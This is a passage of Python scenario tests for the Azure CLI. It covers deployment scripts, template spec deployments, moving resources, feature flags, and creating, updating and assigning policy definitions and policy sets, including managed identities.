'template_file': os.path.join(curr_dir, 'deployment-scripts-deploy.json').replace('\\', '\\\\'),
})
count = 0
self.cmd('deployment-scripts list',
checks=self.check("length([?name=='{deployment_script_name}'])", count))
self.cmd('deployment group create -g {resource_group} -n {deployment_name} --template-file "{template_file}" --parameters scriptName={deployment_script_name}', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{resource_group}'),
])
count += 1
self.cmd('deployment-scripts list',
checks=self.check("length([?name=='{deployment_script_name}'])", count))
@ResourceGroupPreparer(name_prefix='cli_test_deployment_scripts', location='brazilsouth')
def test_show_deployment_script(self, resource_group):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'deployment_script_name': self.create_random_name('script', 20),
'deployment_name': self.create_random_name('ds', 20),
'resource_group': resource_group,
'template_file': os.path.join(curr_dir, 'deployment-scripts-deploy.json').replace('\\', '\\\\'),
})
self.cmd('deployment group create -g {resource_group} -n {deployment_name} --template-file "{template_file}" --parameters scriptName={deployment_script_name}', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{resource_group}'),
])
self.cmd("deployment-scripts show --resource-group {resource_group} --name {deployment_script_name}",
checks=self.check('name', '{deployment_script_name}'))
@ResourceGroupPreparer(name_prefix='cli_test_deployment_scripts', location='brazilsouth')
def test_show_deployment_script_logs(self, resource_group):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'deployment_script_name': self.create_random_name('script', 20),
'deployment_name': self.create_random_name('ds', 20),
'resource_group': resource_group,
'template_file': os.path.join(curr_dir, 'deployment-scripts-deploy.json').replace('\\', '\\\\'),
})
self.cmd('deployment group create -g {resource_group} -n {deployment_name} --template-file "{template_file}" --parameters scriptName={deployment_script_name}', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{resource_group}'),
])
deployment_script_logs = self.cmd("deployment-scripts show-log --resource-group {resource_group} --name {deployment_script_name}").get_output_in_json()
self.assertTrue(deployment_script_logs['value'] is not None)
@ResourceGroupPreparer(name_prefix='cli_test_deployment_scripts', location='brazilsouth')
def test_delete_deployment_script(self, resource_group):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'deployment_script_name': self.create_random_name('script', 20),
'deployment_name': self.create_random_name('ds', 20),
'resource_group': resource_group,
'template_file': os.path.join(curr_dir, 'deployment-scripts-deploy.json').replace('\\', '\\\\'),
})
self.cmd('deployment group create -g {resource_group} -n {deployment_name} --template-file "{template_file}" --parameters scriptName={deployment_script_name}', checks=[
self.check('properties.provisioningState', 'Succeeded'),
self.check('resourceGroup', '{resource_group}'),
])
# making sure it exists first
self.cmd("deployment-scripts show --resource-group {resource_group} --name {deployment_script_name}",
checks=self.check('name', '{deployment_script_name}'))
self.cmd("deployment-scripts delete --resource-group {resource_group} --name {deployment_script_name} --yes")
self.cmd('deployment-scripts list',
checks=self.check("length([?name=='{deployment_script_name}'])", 0))
class DeploymentTestAtSubscriptionScopeTemplateSpecs(ScenarioTest):
@AllowLargeResponse(4096)
@ResourceGroupPreparer(name_prefix='cli_test_template_specs_tenant_deploy', location='eastus')
def test_subscription_level_deployment_ts(self, resource_group, resource_group_location):
curr_dir = os.path.dirname(os.path.realpath(__file__))
template_spec_name = self.create_random_name('cli-test-sub-lvl-ts-deploy', 60)
self.kwargs.update({
'template_spec_name': template_spec_name,
'resource_group_location': resource_group_location,
'tf': os.path.join(curr_dir, 'subscription_level_template.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'subscription_level_parameters.json').replace('\\', '\\\\'),
# params-uri below is the raw file url of the subscription_level_parameters.json above
'params_uri': 'https://raw.githubusercontent.com/Azure/azure-cli/dev/src/azure-cli/azure/cli/command_modules/resource/tests/latest/subscription_level_parameters.json',
'dn': self.create_random_name('azure-cli-subscription_level_deployment', 60),
'dn2': self.create_random_name('azure-cli-subscription_level_deployment', 60),
'storage-account-name': self.create_random_name('armbuilddemo', 20)
})
result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"',
checks=self.check('name', '1.0')).get_output_in_json()
self.kwargs['template_spec_version_id'] = result['id']
self.cmd('deployment sub validate --location WestUS --template-spec {template_spec_version_id} --parameters "{params_uri}" --parameters storageAccountName="{storage-account-name}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment sub create -n {dn} --location WestUS --template-spec {template_spec_version_id} --parameters @"{params}" --parameters storageAccountName="{storage-account-name}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment sub show -n {dn}', checks=[
self.check('name', '{dn}')
])
self.cmd('deployment sub export -n {dn}', checks=[
])
self.cmd('deployment operation sub list -n {dn}', checks=[
self.check('length([])', 5)
])
self.cmd('deployment sub create -n {dn2} --location WestUS --template-spec "{template_spec_version_id}" --parameters @"{params}" --no-wait')
self.cmd('deployment sub cancel -n {dn2}')
self.cmd('deployment sub show -n {dn2}', checks=[
self.check('properties.provisioningState', 'Canceled')
])
# clean up
self.kwargs['template_spec_id'] = result['id'].replace('/versions/1.0', ' ')
self.cmd('ts delete --template-spec {template_spec_id} --yes')
class DeploymentTestAtResourceGroupTemplateSpecs(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_template_specs_resource_group_deployment', location='westus')
def test_resource_group_deployment_ts(self, resource_group, resource_group_location):
curr_dir = os.path.dirname(os.path.realpath(__file__))
template_spec_name = self.create_random_name('cli-test-resource-group-ts-deploy', 60)
self.kwargs.update({
'template_spec_name': template_spec_name,
'resource_group_location': resource_group_location,
'tf': os.path.join(curr_dir, 'simple_deploy.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'simple_deploy_parameters.json').replace('\\', '\\\\'),
'dn': self.create_random_name('azure-cli-resource-group-deployment', 60),
'dn2': self.create_random_name('azure-cli-resource-group-deployment', 60),
})
result = self.cmd('ts create -g {rg} -n {template_spec_name} -v 1.0 -l {resource_group_location} -f "{tf}"',
checks=self.check('name', '1.0')).get_output_in_json()
self.kwargs['template_spec_version_id'] = result['id']
self.cmd('deployment group validate --resource-group {rg} --template-spec "{template_spec_version_id}" --parameters @"{params}"', checks=[
self.check('properties.provisioningState', 'Succeeded')
])
self.cmd('deployment group create --resource-group {rg} -n {dn} --template-spec "{template_spec_version_id}" --parameters @"{params}"', checks=[
self.check('properties.provisioningState', 'Succeeded'),
])
self.cmd('deployment group list --resource-group {rg}', checks=[
self.check('[0].name', '{dn}'),
])
self.cmd('deployment group list --resource-group {rg} --filter "provisioningState eq \'Succeeded\'"', checks=[
self.check('[0].name', '{dn}'),
])
self.cmd('deployment group show --resource-group {rg} -n {dn}', checks=[
self.check('name', '{dn}')
])
self.cmd('deployment group export --resource-group {rg} -n {dn}', checks=[
])
self.cmd('deployment operation group list --resource-group {rg} -n {dn}', checks=[
self.check('length([])', 2)
])
self.cmd('deployment group create --resource-group {rg} -n {dn2} --template-spec "{template_spec_version_id}" --parameters @"{params}" --no-wait')
self.cmd('deployment group cancel -n {dn2} -g {rg}')
self.cmd('deployment group show -n {dn2} -g {rg}', checks=[
self.check('properties.provisioningState', 'Canceled')
])
class ResourceMoveScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_resource_move_dest', parameter_name='resource_group_dest', key='rg2')
@ResourceGroupPreparer(name_prefix='cli_test_resource_move_source', key='rg1')
def test_resource_move(self, resource_group, resource_group_dest):
self.kwargs.update({
'nsg1': self.create_random_name('nsg-move', 20),
'nsg2': self.create_random_name('nsg-move', 20)
})
self.kwargs['nsg1_id'] = self.cmd('network nsg create -n {nsg1} -g {rg1}').get_output_in_json()['NewNSG']['id']
self.kwargs['nsg2_id'] = self.cmd('network nsg create -n {nsg2} -g {rg1}').get_output_in_json()['NewNSG']['id']
self.cmd('resource move --ids {nsg1_id} {nsg2_id} --destination-group {rg2}')
self.cmd('network nsg show -g {rg2} -n {nsg1}', checks=[
self.check('name', '{nsg1}')])
self.cmd('network nsg show -g {rg2} -n {nsg2}', checks=[
self.check('name', '{nsg2}')])
class FeatureScenarioTest(ScenarioTest):
@AllowLargeResponse(8192)
def test_feature_list(self):
self.cmd('feature list', checks=self.check("length([?name=='Microsoft.Xrm/uxdevelopment'])", 1))
self.cmd('feature list --namespace Microsoft.Network',
checks=self.check("length([?name=='Microsoft.Network/SkipPseudoVipGeneration'])", 1))
# Once a feature goes GA , it will be removed from the feature list. Once that happens, use other ones to test
self.cmd('feature show --namespace Microsoft.Network -n AllowLBPreview')
@AllowLargeResponse(8192)
def test_feature_unregister(self):
self.cmd('feature unregister --namespace Microsoft.Network --name AllowLBPreview', checks=[
self.check_pattern('properties.state', 'Unregistering|Unregistered')
])
class PolicyScenarioTest(ScenarioTest):
def cmdstring(self, basic, management_group=None, subscription=None):
cmd = basic
if (management_group):
cmd = cmd + ' --management-group {mg}'
if (subscription):
cmd = cmd + ' --subscription {sub}'
return cmd
def applyPolicy(self):
# create a policy assignment on a resource group
self.kwargs.update({
'pan': self.create_random_name('azurecli-test-policy-assignment', 40),
'padn': self.create_random_name('test_assignment', 20)
})
self.cmd('policy assignment create --policy {pn} -n {pan} --display-name {padn} -g {rg} --params "{params}"', checks=[
self.check('name', '{pan}'),
self.check('displayName', '{padn}'),
self.check('sku.name', 'A0'),
self.check('sku.tier', 'Free')
])
# create a policy assignment with not scopes and standard sku
self.kwargs.update({
'vnet': self.create_random_name('azurecli-test-policy-vnet', 40),
'subnet': self.create_random_name('azurecli-test-policy-subnet', 40),
'sub': self.get_subscription_id()
})
self.cmd('network vnet create -g {rg} -n {vnet} --subnet-name {subnet}')
self.kwargs['notscope'] = '/subscriptions/{sub}/resourceGroups/{rg}/providers/Microsoft.Network/virtualNetworks'.format(**self.kwargs)
self.cmd('policy assignment create --policy {pn} -n {pan} --display-name {padn} -g {rg} --not-scopes {notscope} --params "{params}" --sku standard', checks=[
self.check('name', '{pan}'),
self.check('displayName', '{padn}'),
self.check('sku.name', 'A1'),
self.check('sku.tier', 'Standard'),
self.check('notScopes[0]', '{notscope}')
])
# create a policy assignment using a built in policy definition name
self.kwargs['pan2'] = self.create_random_name('azurecli-test-policy-assignment2', 40)
self.kwargs['bip'] = '06a78e20-9358-41c9-923c-fb736d382a4d'
self.cmd('policy assignment create --policy {bip} -n {pan2} --display-name {padn} -g {rg}', checks=[
self.check('name', '{pan2}'),
self.check('displayName', '{padn}')
])
self.cmd('policy assignment delete -n {pan2} -g {rg}')
# listing at subscription level won't find the assignment made at a resource group
import jmespath
try:
self.cmd('policy assignment list', checks=self.check("length([?name=='{pan}'])", 0))
except jmespath.exceptions.JMESPathTypeError: # ok if query fails on None result
pass
# but enable --show-all works
self.cmd('policy assignment list --disable-scope-strict-match', checks=self.check("length([?name=='{pan}'])", 1))
# delete the assignment and validate it's gone
self.cmd('policy assignment delete -n {pan} -g {rg}')
self.cmd('policy assignment list --disable-scope-strict-match', checks=self.check("length([?name=='{pan}'])", 0))
def applyPolicyAtScope(self, scope, policyId, enforcementMode='Default'):
# create a policy assignment at the given scope
self.kwargs.update({
'pol': policyId,
'pan': self.create_random_name('cli-test-polassg', 24), # limit is 24 characters at MG scope
'padn': self.create_random_name('test_assignment', 20),
'scope': scope,
'em': enforcementMode
})
self.cmd('policy assignment create --policy {pol} -n {pan} --display-name {padn} --params "{params}" --scope {scope} --enforcement-mode {em}', checks=[
self.check('name', '{pan}'),
self.check('displayName', '{padn}'),
self.check('sku.name', 'A0'),
self.check('sku.tier', 'Free'),
self.check('enforcementMode', '{em}')
])
# ensure the policy assignment shows up in the list result
self.cmd('policy assignment list --scope {scope}', checks=self.check("length([?name=='{pan}'])", 1))
# delete the assignment and validate it's gone
self.cmd('policy assignment delete -n {pan} --scope {scope}')
self.cmd('policy assignment list --disable-scope-strict-match', checks=self.check("length([?name=='{pan}'])", 0))
def resource_policy_operations(self, resource_group, management_group=None, subscription=None):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'pn': self.create_random_name('azure-cli-test-policy', 30),
'pdn': self.create_random_name('test_policy', 20),
'desc': 'desc_for_test_policy_123',
'rf': os.path.join(curr_dir, 'sample_policy_rule.json').replace('\\', '\\\\'),
'pdf': os.path.join(curr_dir, 'sample_policy_param_def.json').replace('\\', '\\\\'),
'params': os.path.join(curr_dir, 'sample_policy_param.json').replace('\\', '\\\\'),
'mode': 'Indexed',
'metadata': 'test',
'updated_metadata': 'test2',
})
if (management_group):
self.kwargs.update({'mg': management_group})
if (subscription):
self.kwargs.update({'sub': subscription})
# create a policy
cmd = self.cmdstring('policy definition create -n {pn} --rules "{rf}" --params "{pdf}" --display-name {pdn} --description {desc} --mode {mode} --metadata category={metadata}', management_group, subscription)
self.cmd(cmd, checks=[
self.check('name', '{pn}'),
self.check('displayName', '{pdn}'),
self.check('description', '{desc}'),
self.check('mode', '{mode}'),
self.check('metadata.category', '{metadata}')
])
# update it
self.kwargs['desc'] = self.kwargs['desc'] + '_new'
self.kwargs['pdn'] = self.kwargs['pdn'] + '_new'
cmd = self.cmdstring('policy definition update -n {pn} --description {desc} --display-name {pdn} --metadata category={updated_metadata}', management_group, subscription)
self.cmd(cmd, checks=[
self.check('description', '{desc}'),
self.check('displayName', '{pdn}'),
self.check('metadata.category', '{updated_metadata}')
])
# update it with new parameters and a new rule
self.kwargs['pdf'] = os.path.join(curr_dir, 'sample_policy_param_def_2.json').replace('\\', '\\\\')
self.kwargs['rf'] = os.path.join(curr_dir, 'sample_policy_rule_2.json').replace('\\', '\\\\')
cmd = self.cmdstring('policy definition update -n {pn} --description {desc} --display-name {pdn} --metadata category=test2 --params "{pdf}" --rules "{rf}"', management_group, subscription)
self.cmd(cmd, checks=[
self.check('description', '{desc}'),
self.check('displayName', '{pdn}'),
self.check('metadata.category', '{updated_metadata}'),
self.check('parameters.allowedLocations.metadata.displayName', 'Allowed locations 2'),
self.check('policyRule.then.effect', 'audit')
])
# list and show it
cmd = self.cmdstring('policy definition list', management_group, subscription)
self.cmd(cmd, checks=self.check("length([?name=='{pn}'])", 1))
cmd = self.cmdstring('policy definition show -n {pn}', management_group, subscription)
self.cmd(cmd, checks=[
self.check('name', '{pn}'),
self.check('displayName', '{pdn}')
])
# apply assignments
if management_group:
scope = '/providers/Microsoft.Management/managementGroups/{mg}'.format(mg=management_group)
policy = '{scope}/providers/Microsoft.Authorization/policyDefinitions/{pn}'.format(pn=self.kwargs['pn'], scope=scope)
self.applyPolicyAtScope(scope, policy)
elif subscription:
policy = '/subscriptions/{sub}/providers/Microsoft.Authorization/policyDefinitions/{pn}'.format(sub=subscription, pn=self.kwargs['pn'])
self.applyPolicyAtScope('/subscriptions/{sub}'.format(sub=subscription), policy, 'DoNotEnforce')
else:
self.applyPolicy()
# delete the policy
cmd = self.cmdstring('policy definition delete -n {pn}', management_group, subscription)
self.cmd(cmd)
time.sleep(10) # ensure the policy is gone when run live.
cmd = self.cmdstring('policy definition list', management_group, subscription)
self.cmd(cmd, checks=self.check("length([?name=='{pn}'])", 0))
def resource_policyset_operations(self, resource_group, management_group=None, subscription=None):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'pn': self.create_random_name('azure-cli-test-policy', 30),
'pdn': self.create_random_name('test_policy', 20),
'desc': 'desc_for_test_policy_123',
'dpn': self.create_random_name('azure-cli-test-data-policy', 30),
'dpdn': self.create_random_name('test_data_policy', 20),
'dp_desc': 'desc_for_test_data_policy_123',
'dp_mode': 'Microsoft.DataCatalog.Data',
'psn': self.create_random_name('azure-cli-test-policyset', 30),
'psdn': self.create_random_name('test_policyset', 20),
'ps_desc': 'desc_for_test_policyset_123',
'rf': os.path.join(curr_dir, 'sample_policy_rule.json').replace('\\', '\\\\'),
'dprf': os.path.join(curr_dir, 'sample_data_policy_rule.json').replace('\\', '\\\\'),
'psf': os.path.join(curr_dir, 'sample_policy_set.json').replace('\\', '\\\\'),
'pdf': os.path.join(curr_dir, 'sample_policy_param_def.json').replace('\\', '\\\\'),
'metadata': 'test',
'updated_metadata': 'test2',
})
if (management_group):
self.kwargs.update({'mg': management_group})
if (subscription):
self.kwargs.update({'sub': subscription})
time.sleep(60)
# create a policy
cmd = self.cmdstring('policy definition create -n {pn} --rules "{rf}" --params "{pdf}" --display-name {pdn} --description {desc}', management_group, subscription)
policy = self.cmd(cmd).get_output_in_json()
# create a data policy
cmd = self.cmdstring('policy definition create -n {dpn} --rules "{dprf}" --mode {dp_mode} --display-name {dpdn} --description {dp_desc}', management_group, subscription)
datapolicy = self.cmd(cmd).get_output_in_json()
# create a policy set
policyset = get_file_json(self.kwargs['psf'])
policyset[0]['policyDefinitionId'] = policy['id']
policyset[1]['policyDefinitionId'] = datapolicy['id']
with open(os.path.join(curr_dir, 'sample_policy_set.json'), 'w') as outfile:
json.dump(policyset, outfile)
cmd = self.cmdstring('policy set-definition create -n {psn} --definitions @"{psf}" --display-name {psdn} --description {ps_desc} --metadata category={metadata}', management_group, subscription)
self.cmd(cmd, checks=[
self.check('name', '{psn}'),
self.check('displayName', '{psdn}'),
self.check('description', '{ps_desc}'),
self.check('metadata.category', '{metadata}')
])
# update it
self.kwargs['ps_desc'] = self.kwargs['ps_desc'] + '_new'
self.kwargs['psdn'] = self.kwargs['psdn'] + '_new'
cmd = self.cmdstring('policy set-definition update -n {psn} --display-name {psdn} --description {ps_desc} --metadata category={updated_metadata}', management_group, subscription)
self.cmd(cmd, checks=[
self.check('description', '{ps_desc}'),
self.check('displayName', '{psdn}'),
self.check('metadata.category', '{updated_metadata}')
])
# list and show it
cmd = self.cmdstring('policy set-definition list', management_group, subscription)
self.cmd(cmd, checks=self.check("length([?name=='{psn}'])", 1))
cmd = self.cmdstring('policy set-definition show -n {psn}', management_group, subscription)
self.cmd(cmd, checks=[
self.check('name', '{psn}'),
self.check('displayName', '{psdn}')
])
# create a policy assignment on a resource group
if not management_group and not subscription:
self.kwargs.update({
'pan': self.create_random_name('azurecli-test-policy-assignment', 40),
'padn': self.create_random_name('test_assignment', 20)
})
self.cmd('policy assignment create -d {psn} -n {pan} --display-name {padn} -g {rg}', checks=[
self.check('name', '{pan}'),
self.check('displayName', '{padn}'),
self.check('sku.name', 'A0'),
self.check('sku.tier', 'Free'),
])
# ensure the assignment appears in the list results
self.cmd('policy assignment list --resource-group {rg}', checks=self.check("length([?name=='{pan}'])", 1))
# delete the assignment and validate it's gone
self.cmd('policy assignment delete -n {pan} -g {rg}')
self.cmd('policy assignment list --disable-scope-strict-match', checks=self.check("length([?name=='{pan}'])", 0))
# delete the policy set
cmd = self.cmdstring('policy set-definition delete -n {psn}', management_group, subscription)
self.cmd(cmd)
time.sleep(10) # ensure the policy is gone when run live.
cmd = self.cmdstring('policy set-definition list', management_group, subscription)
self.cmd(cmd, checks=self.check("length([?name=='{psn}'])", 0))
# create a parameterized policy set
self.kwargs['psf'] = os.path.join(curr_dir, 'sample_policy_set_parameterized.json').replace('\\', '\\\\')
policyset = get_file_json(self.kwargs['psf'])
policyset[0]['policyDefinitionId'] = policy['id']
policyset[1]['policyDefinitionId'] = datapolicy['id']
with open(os.path.join(curr_dir, 'sample_policy_set_parameterized.json'), 'w') as outfile:
json.dump(policyset, outfile)
cmd = self.cmdstring('policy set-definition create -n {psn} --definitions @"{psf}" --display-name {psdn} --description {ps_desc} --params "{pdf}" --metadata category={updated_metadata}', management_group, subscription)
self.cmd(cmd, checks=[
self.check('name', '{psn}'),
self.check('displayName', '{psdn}'),
self.check('description', '{ps_desc}'),
self.check('policyDefinitions[0].parameters.allowedLocations.value', "[parameters('allowedLocations')]"),
self.check('parameters.allowedLocations.type', 'Array'),
self.check('metadata.category', '{updated_metadata}')
])
# update the parameters on the policy set
self.kwargs['pdf'] = os.path.join(curr_dir, 'sample_policy_param_def_2.json').replace('\\', '\\\\')
cmd = self.cmdstring('policy set-definition update -n {psn} --params "{pdf}" --metadata category={updated_metadata}', management_group, subscription)
self.cmd(cmd, checks=[
self.check('parameters.allowedLocations.metadata.displayName', 'Allowed locations 2'),
self.check('metadata.category', '{updated_metadata}')
])
# delete the parameterized policy set
cmd = self.cmdstring('policy set-definition delete -n {psn}', management_group, subscription)
self.cmd(cmd)
time.sleep(10) # ensure the policy is gone when run live.
cmd = self.cmdstring('policy set-definition list', management_group, subscription)
self.cmd(cmd, checks=self.check("length([?name=='{psn}'])", 0))
# delete the policy
cmd = self.cmdstring('policy definition delete -n {pn}', management_group, subscription)
self.cmd(cmd)
time.sleep(10)
# delete the data policy
cmd = self.cmdstring('policy definition delete -n {dpn}', management_group, subscription)
self.cmd(cmd)
time.sleep(10)
# ensure the policy is gone when run live.
cmd = self.cmdstring('policy definition list', management_group, subscription)
self.cmd(cmd, checks=self.check("length([?name=='{pn}'])", 0))
self.cmd(cmd, checks=self.check("length([?name=='{dpn}'])", 0))
@ResourceGroupPreparer(name_prefix='cli_test_policy')
@AllowLargeResponse(8192)
def test_resource_policy_default(self, resource_group):
self.resource_policy_operations(resource_group)
@ResourceGroupPreparer(name_prefix='cli_test_policy_identity')
@AllowLargeResponse(8192)
def test_resource_policy_identity(self, resource_group, resource_group_location):
self.kwargs.update({
'pan': self.create_random_name('azurecli-test-policy-assignment', 40),
'bip': '06a78e20-9358-41c9-923c-fb736d382a4d',
'sub': self.get_subscription_id(),
'location': resource_group_location,
'em': 'DoNotEnforce'
})
with self.assertRaises(IncorrectUsageError):
self.cmd('policy assignment create --policy \'test/error_policy\' -n {pan} -g {rg} --location {location} --assign-identity --enforcement-mode {em}')
# create a policy assignment with managed identity using a built in policy definition
assignmentIdentity = self.cmd('policy assignment create --policy {bip} -n {pan} -g {rg} --location {location} --assign-identity --enforcement-mode {em}', checks=[
self.check('name', '{pan}'),
self.check('location', '{location}'),
self.check('identity.type', 'SystemAssigned'),
self.exists('identity.principalId'),
self.exists('identity.tenantId')
]).get_output_in_json()['identity']
# ensure managed identity details are retrievable directly through 'policy assignment identity' commands
self.cmd('policy assignment identity show -n {pan} -g {rg}', checks=[
self.check('type', assignmentIdentity['type']),
self.check('principalId', assignmentIdentity['principalId']),
self.check('tenantId', assignmentIdentity['tenantId'])
])
# remove the managed identity and ensure it is removed when retrieving the policy assignment
self.cmd('policy assignment identity remove -n {pan} -g {rg}', checks=[
self.check('type', 'None')
])
self.cmd('policy assignment show -n {pan} -g {rg}', checks=[
self.check('name', '{pan}'),
self.check('identity.type', 'None')
])
# add an identity using 'identity assign'
self.cmd('policy assignment identity assign -n {pan} -g {rg}', checks=[
self.check('type', 'SystemAssigned'),
self.exists('principalId'),
self.exists('tenantId')
])
self.cmd('policy assignment show -n {pan} -g {rg}', checks=[
self.check('name', '{pan}'),
self.check('identity.type', 'SystemAssigned'),
self.exists('identity.principalId'),
self.exists('identity.tenantId')
])
self.cmd('policy assignment identity remove -n {pan} -g {rg}', checks=[
self.check('type', 'None')
])
# create a role assignment for the identity using --assign-identity
self.kwargs.update({
'idScope': '/subscriptions/{sub}/resourceGroups/{rg}'.format(**self.kwargs),
'idRole': 'Reader'
})
with mock.patch('azure.cli.core.commands.arm._gen_guid', side_effect=self.create_guid):
assignmentIdentity = self.cmd('policy assignment create --policy {bip} -n {pan} -g {rg} --location {location} --assign-identity --identity-scope {idScope} --role {idRole}', checks=[
self.check('name', '{pan}'),
self.check('location', '{location}'),
self.check('identity.type', 'SystemAssigned'),
self.exists('identity.principalId'),
self.exists('identity.tenantId')
]).get_output_in_json()['identity']
self.kwargs['principalId'] = assignmentIdentity['principalId']
self.cmd('role assignment list --resource-group {rg} --role {idRole}', checks=[
self.check("length([?principalId == '{principalId}'])", 1),
self.check("[?principalId == '{principalId}'].roleDefinitionName | [0]", '{idRole}')
])
self.cmd('policy assignment identity remove -n {pan} -g {rg}', checks=[
self.check('type', 'None')
])
# create a role assignment for the identity using 'identity assign'
with mock.patch('azure.cli.core.commands.arm._gen_guid', side_effect=self.create_guid):
assignmentIdentity = self.cmd('policy assignment identity assign -n {pan} -g {rg} --identity-scope {idScope} --role {idRole}', checks=[
self.check('type', 'SystemAssigned'),
self.exists('principalId'),
self.exists('tenantId')
]).get_output_in_json()
self.kwargs['principalId'] = assignmentIdentity['principalId']
self.cmd('role assignment list --resource-group {rg} --role {idRole}', checks=[
self.check("length([?principalId == '{principalId}'])", 1),
self.check("[?principalId == '{principalId}'].roleDefinitionName | [0]", '{idRole}')
])
self.cmd('policy assignment delete -n {pan} -g {rg}')
@ResourceGroupPreparer(name_prefix='cli_test_policy_management_group')
@AllowLargeResponse(4096)
def test_resource_policy_management_group(self, resource_group):
management_group_name = self.create_random_name('cli-test-mgmt-group', 30)
self.cmd('account management-group create -n ' + management_group_name)
try:
self.resource_policy_operations(resource_group, management_group_name)
# Attempt to get a policy definition at an invalid management group scope
with self.assertRaises(SystemExit):
self.cmd(self.cmdstring('policy definition show -n "/providers/microsoft.management/managementgroups/myMg/providers/microsoft.authorization/missingsegment"'))
finally:
self.cmd('account management-group delete -n ' + management_group_name)
@record_only()
@unittest.skip('mock doesnt work when the subscription comes from --scope')
@ResourceGroupPreparer(name_prefix='cli_test_policy_subscription_id')
@AllowLargeResponse()
def test_resource_policy_subscription_id(self, resource_group):
# under playback, we mock it so the subscription id will be '00000000...' and it will match
# the same sanitized value in the recording
if not self.in_recording:
with mock.patch('azure.cli.command_modules.resource.custom._get_subscription_id_from_subscription',
return_value=MOCKED_SUBSCRIPTION_ID):
self.resource_policy_operations(resource_group, None, 'f67cc918-f64f-4c3f-aa24-a855465f9d41')
else:
self.resource_policy_operations(resource_group, None, 'f67cc918-f64f-4c3f-aa24-a855465f9d41')
@ResourceGroupPreparer(name_prefix='cli_test_policyset')
@AllowLargeResponse(4096)
def test_resource_policyset_default(self, resource_group):
self.resource_policyset_operations(resource_group)
@ResourceGroupPreparer(name_prefix='cli_test_policyset_management_group')
@AllowLargeResponse(4096)
def test_resource_policyset_management_group(self, resource_group):
management_group_name = self.create_random_name('cli-test-mgmt-group', 30)
self.cmd('account management-group create -n ' + management_group_name)
try:
self.resource_policyset_operations(resource_group, management_group_name)
finally:
self.cmd('account management-group delete -n ' + management_group_name)
@record_only()
@ResourceGroupPreparer(name_prefix='cli_test_policyset_subscription_id')
@AllowLargeResponse(4096)
def test_resource_policyset_subscription_id(self, resource_group):
# under playback, we mock it so the subscription id will be '00000000...' and it will match
# the same sanitized value in the recording
if not self.in_recording:
with mock.patch('azure.cli.command_modules.resource.custom._get_subscription_id_from_subscription',
return_value=MOCKED_SUBSCRIPTION_ID):
self.resource_policyset_operations(resource_group, None, '0b1f6471-1bf0-4dda-aec3-cb9272f09590')
else:
self.resource_policyset_operations(resource_group, None, '0b1f6471-1bf0-4dda-aec3-cb9272f09590')
@ResourceGroupPreparer(name_prefix='cli_test_policyset_grouping')
@AllowLargeResponse(4096)
def test_resource_policyset_grouping(self, resource_group):
curr_dir = os.path.dirname(os.path.realpath(__file__))
self.kwargs.update({
'pn': self.create_random_name('azure-cli-test-policy', 30),
'pdn': self.create_random_name('test_policy', 20),
'psn': self.create_random_name('azure-cli-test-policyset', 30),
'psdn': self.create_random_name('test_policyset', 20),
'rf': os.path.join(curr_dir, 'sample_policy_rule.json').replace('\\', '\\\\'),
'psf': os.path.join(curr_dir, 'sample_policy_set_grouping.json').replace('\\', '\\\\'),
'pgf': os.path.join(curr_dir, 'sample_policy_groups_def.json').replace('\\', '\\\\'),
'pgf2': os.path.join(curr_dir, 'sample_policy_groups_def2.json').replace('\\', '\\\\'),
'pdf': os.path.join(curr_dir, 'sample_policy_param_def.json').replace('\\', '\\\\')
})
# create a policy
policy = self.cmd('policy definition create -n {pn} --rules "{rf}" --params "{pdf}" --display-name {pdn}').get_output_in_json()
# create a policy set
policyset = get_file_json(self.kwargs['psf'])
policyset[0]['policyDefinitionId'] = policy['id']
policyset[1]['policyDefinitionId'] = policy['id']
with open(os.path.join(curr_dir, 'sample_policy_set_grouping.json'), 'w') as outfile:
json.dump(policyset, outfile)
self.cmd('policy set-definition create -n {psn} --definitions @"{psf}" --display-name {psdn} --definition-groups @"{pgf}"', checks=[
self.check('name', '{psn}'),
self.check('displayName', '{psdn}'),
self.check('length(policyDefinitionGroups)', 2),
self.check("length(policyDefinitionGroups[?name=='group1'])", 1),
self.check("length(policyDefinitionGroups[?name=='group2'])", 1),
self.check('length(policyDefinitions[0].groupNames)', 2),
self.check('length(policyDefinitions[1].groupNames)', 1)
])
# update the groups
groups = get_file_json(self.kwargs['pgf'])
groups[0]['displayName'] = "Updated display name"
with open(os.path.join(curr_dir, 'sample_policy_groups_def2.json'), 'w') as outfile:
json.dump(groups, outfile)
self.cmd('policy set-definition update -n {psn} --definition-groups @"{pgf2}"', checks=[
self.check('length(policyDefinitionGroups)', 2),
self.check("length(policyDefinitionGroups[?name=='group1'])", 1),
self.check("length(policyDefinitionGroups[?name=='group2'])", 1),
self.check("length(policyDefinitionGroups[?displayName=='Updated display name\'])", 1)
])
# show it
self.cmd('policy set-definition show -n {psn}',
checks=self.check('length(policyDefinitionGroups)', 2))
# delete the policy set
self.cmd('policy set-definition delete -n {psn}')
time.sleep(10) # ensure the policy is gone when run live.
self.cmd('policy set-definition list',
checks=self.check("length([?name=='{psn}'])", 0))
# delete the policy
self.cmd('policy definition delete -n {pn}')
@AllowLargeResponse(8192)
def test_show_built_in_policy(self):
# get the list of builtins, then retrieve each via show and validate the results match
results = self.cmd('policy definition list --query "[?policyType==\'BuiltIn\']"').get_output_in_json()
for i, result in enumerate(results):
self.kwargs['pn'] = result['name']
self.kwargs['dn'] = result['displayName']
self.kwargs['desc'] = result['description']
self.kwargs['id'] = result['id']
self.cmd('policy definition show -n {pn}', checks=[
self.check('name', '{pn}'),
self.check('description', '{desc}'),
